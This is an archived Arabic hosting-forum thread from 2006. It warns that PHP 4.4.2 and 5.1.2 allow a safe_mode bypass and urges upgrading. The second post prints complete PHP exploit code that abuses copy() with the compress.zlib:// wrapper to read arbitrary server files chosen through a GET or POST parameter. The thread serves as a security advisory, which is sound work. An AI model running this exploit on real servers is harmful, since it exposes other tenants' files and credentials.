بحث متقدم | التسجيل
الويب العربي
  تسجيل دخول
 
   
   

  ملاحظة
الموقع متاح للإطلاع والقراءة فقط، المشاركة والمواضيع الجديدة غير متاحة حالياً لحين تطوير الموقع.




الموقع متاح للإطلاع والقراءة فقط، المشاركة والمواضيع الجديدة غير متاحة حالياً لحين تطوير الموقع.

عـودة للخلف   الويب العربي سوق الإستضافة إدارة وتشغيل السيرفرات

إدارة وتشغيل السيرفرات تبادل الخبرات في إدارة السيرفرات, الشبكات وأنظمة التشغيل.

موضوع مغلق اضف موضوع جديد
 
خيارات الموضوع طريقة العرض
  #1  
قديم 17-06-2006, 07:48 PM
support4php support4php غير متصل
عضو
 
تاريخ التسجيل: Apr 2006
المدينة: المملكة العربية السعودية
مشاركة: 190
مستوى تقييم العضوية: 19
support4php is on a distinguished road
إرسال رسالة عبر ICQ إلى support4php إرسال رسالة عبر  AIM إلى support4php إرسال رسالة عبر MSN إلى support4php إرسال رسالة عبر Yahoo إلى support4php
Exclamation مهم جداً الرجاء من كل شركات الاستضافة الدخول وترقيع ثغرة خطيرة جداً,,

بسم الله الرحمن الرحيم

================================================

الموضوع زي ما قريتو يا اخوان فيه ثغرة في السيرفرات الي تستخدم نظام >> php

من إصدار معين وهي كفيلة لو كانت الثغره في سيرفرك راح يتم اختراق كل المواقع

الي على السيرفر زي السلام عليكم ,, وهذا تفسير الاختراقات حقت الأيام الماضية


كلها بسبب دوال مفعلة في السيرفر خلونا نشوف معلومات عن الثغره وطريقة الحماية منها

واكرر الموضوع مهم جداً لشركات الاستضافة بالذات :-


================================================

معلومات عن الثغرة:-

الدوال المصابة / copy , mail , mb_mail

الثغرة تسمح بتطبيق الأوامر على السيرفر وحالة السيرفر >> safe_mode: ON :thumbdown

الاصدارات المصابة بها / PHP 4.4.2 and PHP 5.1.2 وهالأصدار ما شاء الله اغلب الاستضافات تستخدمه.

الترقيع / تحديث اصدار برنامج >> php الى إصدار غير الي ذكرتها.

ارجو ممن توفرت في سيرفراتهم الشروط المطلوبة لعمل الثغرة سرعة الترقية إلى إصدار غير المصاب..

هذا والله أعلم ,,, اللهم قد بلغت.






التوقيع
  • إقتباس:

    • أسم الشركـــه : مجموعة الدعم الفني العربي
    • أداء الشركـــه : حماية شاملة / تركيب وتطوير منتديات / إصلاح مشاكل قواعد البيانات / دمج قواعد بيانات / المزيد..
    • الدعم الفنــــي : http://www.support4php.com/support
    • خـدمــاتـــــنـــا : اضــغــط هـنـا

  #2  
قديم 17-06-2006, 07:49 PM
support4php support4php غير متصل
عضو
 
تاريخ التسجيل: Apr 2006
المدينة: المملكة العربية السعودية
مشاركة: 190
مستوى تقييم العضوية: 19
support4php is on a distinguished road
إرسال رسالة عبر ICQ إلى support4php إرسال رسالة عبر  AIM إلى support4php إرسال رسالة عبر MSN إلى support4php إرسال رسالة عبر Yahoo إلى support4php
الافتراضي

وهذا جزء من أكواد الشيل الي يستخدم في تخطي السيف مود للاصدارات الي ذكرتها:-


كود PHP:
<?php
/*
Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2
*/

$tymczas="/home/web/public_html/vb"// Set $tymczas to dir where you have 777 like /var/tmp

if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
{
 
$safemode true;
 
$hsafemode " ON (secure)";
}
else {
$safemode false$hsafemode " OFF (not secure)";}
echo(
"Safe-mode: $hsafemode");
$v = @ini_get("open_basedir");
if (
$v or strtolower($v) == "on") {$openbasedir true$hopenbasedir " .$v. ";}
else {
$openbasedir false$hopenbasedir " OFF (not secure) ";}
echo(
"<br>");
echo(
"Open base dir: $hopenbasedir");
echo(
"<br>");
echo 
"Disable functions : <b>";
if(
''==($df=@ini_get('disable_functions'))){echo " NONE ";}else{echo $df ";}
$free = @diskfreespace($dir);
if (!
$free) {$free 0;}
$all = @disk_total_space($dir);
if (!
$all) {$all 0;}
$used $all-$free;
$used_percent = @round(100/($all/$free),2);

echo 
"<PRE>\n";
if(empty(
$file)){
if(empty(
$_GET['file'])){
if(empty(
$_POST['file'])){
die(
"\n By \n");
} else {
$file=$_POST['file'];
}
} else {
$file=$_GET['file'];
}
}

$temp=tempnam($tymczas"cx");

if(
copy("compress.zlib://".$file$temp)){
$zrodlo fopen($temp"r");
$tekst fread($zrodlofilesize($temp));
fclose($zrodlo);
echo 
" Start File ".htmlspecialchars($file)." \n".htmlspecialchars($tekst)."\n End File
"
.htmlspecialchars($file)."  \n";
unlink($temp);
die(
" File ".htmlspecialchars($file)." Has been already loaded. Group ... The-;] ");
} else {
die(
" Sorry .. File
<B>"
.htmlspecialchars($file)." dosen't exists or you don't have access. ");
}
?>






التوقيع
  • إقتباس:

    • أسم الشركـــه : مجموعة الدعم الفني العربي
    • أداء الشركـــه : حماية شاملة / تركيب وتطوير منتديات / إصلاح مشاكل قواعد البيانات / دمج قواعد بيانات / المزيد..
    • الدعم الفنــــي : http://www.support4php.com/support
    • خـدمــاتـــــنـــا : اضــغــط هـنـا

  #3  
قديم 17-06-2006, 08:01 PM
السكربت العربي السكربت العربي غير متصل
عضو
 
تاريخ التسجيل: Apr 2005
مشاركة: 1,231
مستوى تقييم العضوية: 22
السكربت العربي will become famous soon enough
وسام الويب الذهبي وسام الويب الفضي وسام الويب البرونزي 
عدد الأوسمة: 3 (المزيد ...)
الافتراضي

الله يعطيكـ العافيـة اخوي support4php
ماشاء الله دائمــا متلق بمواضيعكـ سواءً حمايـة أو غير الحمايـة
الله يباركـ فيكـ





  #4  
قديم 17-06-2006, 08:03 PM
support4php support4php غير متصل
عضو
 
تاريخ التسجيل: Apr 2006
المدينة: المملكة العربية السعودية
مشاركة: 190
مستوى تقييم العضوية: 19
support4php is on a distinguished road
إرسال رسالة عبر ICQ إلى support4php إرسال رسالة عبر  AIM إلى support4php إرسال رسالة عبر MSN إلى support4php إرسال رسالة عبر Yahoo إلى support4php
الافتراضي

إقتباس:

اقتباس من مشاركة السكربت العربي  

   الله يعطيكـ العافيـة اخوي support4php
ماشاء الله دائمــا متلق بمواضيعكـ سواءً حمايـة أو غير الحمايـة
الله يباركـ فيكـ


الله يعافيك يالغالي ومشكور على الرد الحلو.






التوقيع
  • إقتباس:

    • أسم الشركـــه : مجموعة الدعم الفني العربي
    • أداء الشركـــه : حماية شاملة / تركيب وتطوير منتديات / إصلاح مشاكل قواعد البيانات / دمج قواعد بيانات / المزيد..
    • الدعم الفنــــي : http://www.support4php.com/support
    • خـدمــاتـــــنـــا : اضــغــط هـنـا

  #5  
قديم 02-02-2008, 09:00 PM
الصورة الشخصية لـ s52z.com
s52z.com s52z.com غير متصل
عضو
 
تاريخ التسجيل: Jan 2008
مشاركة: 20
مستوى تقييم العضوية: 0
s52z.com is on a distinguished road
الافتراضي

جزاك الله خير





  #6  
قديم 03-02-2008, 06:00 AM
الصورة الشخصية لـ Mustafa Albazy
Mustafa Albazy Mustafa Albazy غير متصل
مصطفى البازي
 
تاريخ التسجيل: Mar 2004
المدينة: المملكة المتحدة - لندن
مشاركة: 1,558
مستوى تقييم العضوية: 10
Mustafa Albazy is on a distinguished road
وسام المشرف المميز في الويب العربي وسام الويب البرونزي وسام الويب الفضي وسام الويب الذهبي 
عدد الأوسمة: 4 (المزيد ...)
Smile

جزاك الله خير اخي

وبل النسبة لصدار الphp


انصح با 4.4.4

بصراحة جدا ممتاز

تحياتي






التوقيع

آخر تعديل بواسطة Mustafa Albazy ، 03-02-2008 الساعة 06:04 AM.
  #7  
قديم 03-02-2008, 11:02 AM
سعودي لحلول الويب سعودي لحلول الويب غير متصل
عضو
 
تاريخ التسجيل: Feb 2008
مشاركة: 8
مستوى تقييم العضوية: 0
سعودي لحلول الويب is on a distinguished road
الافتراضي

شكرا

وتم الترقيع

جزاك الله الف خير





موضوع مغلق



خيارات الموضوع
طريقة العرض

قوانين المشاركة
لا يمكنك إضافة موضوع جديد
لا يمكنك الرد على المواضيع
لا يمكنك إضافة مرفقات
لا يمكنك تعديل مشاركاتك

كود vB متاح
كود [IMG] متاح
كود HTML مغلق
إنتقل إلى

مواضيع مشابهة
الموضوع الكاتب القسم مشاركة آخر مشاركة
[ثغرة]ثغرة في الاهداءات = خطيرة + خطيرة + خطيرة ... احذر تسلم العبقري قسم المنتديات 39 09-10-2007 09:32 PM
مفاجأه ! برنامج حسابات شركات الاستضافة .. مفيد جداً VIP0 طلبات البرمجة والتصميم والتطوير 0 29-04-2007 02:46 PM
العرض المذهل ...... ثلاثة تصاميم بـ 11 لون مختلف , وبسعر مغرى جداً جداً جداً x phantom مزاد المواقع 11 24-10-2006 11:41 AM
ثلاثة تصاميم مختلفة بـ 11 لوناً مختلفين ...... وبسعر مغرى جداً جداً جداً x phantom مزاد المواقع 0 12-10-2006 10:53 PM
ثغرة خطيرة جداً في نسخة برنامج الـvBulletin كلمة جروب قسم المنتديات 1 01-06-2006 08:42 AM


جميع الأوقات بتوقيت مكة المكرمة. الساعة الآن » 10:09 PM.

Powered by vBulletin
Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.


 
 »  خدمات البرمجة   »  رئيسية الدليل
  »  خدمات التصميم   »  الأمن والحماية
  »  الدعاية والتسويق
  »  الدعم والتطوير
  »  الشركات الرسمية
  »  حجز دومينات
  »  خدمات الإستضافة
 
 
  »  مكتبة الإستايلات   »  رئيسية المكتبة
  »  أكواد برمجية   »  أدوات الويب ماسترز
  »  مكتبة الهاكات   »  أدوات المصممين
  »  سكربتات متنوعة
  »  مجلات إلكترونية
  »  بلوكات متنوعة
  »  ثيمات مختلفة
 
 

صحيفة متخصصة في متابعة أخبار وجديد الإنترنت العربي
والحوارات الصحفية ومعلومات تقنية متنوعة .

   
 
 

للتواصل مع فريق عمل الويب العربي
يمكنك ذالك من خلال مركز الدعم والمساندة.

 الدعم الفني |  اعتماد العضويات |  قوانين الإنتساب |  إتفاقية الإستخدام |  أهداف الويب العربي |  دليل الشركات |  مكتبة الويب |  صحيفة الويب العربي |  الرئيسية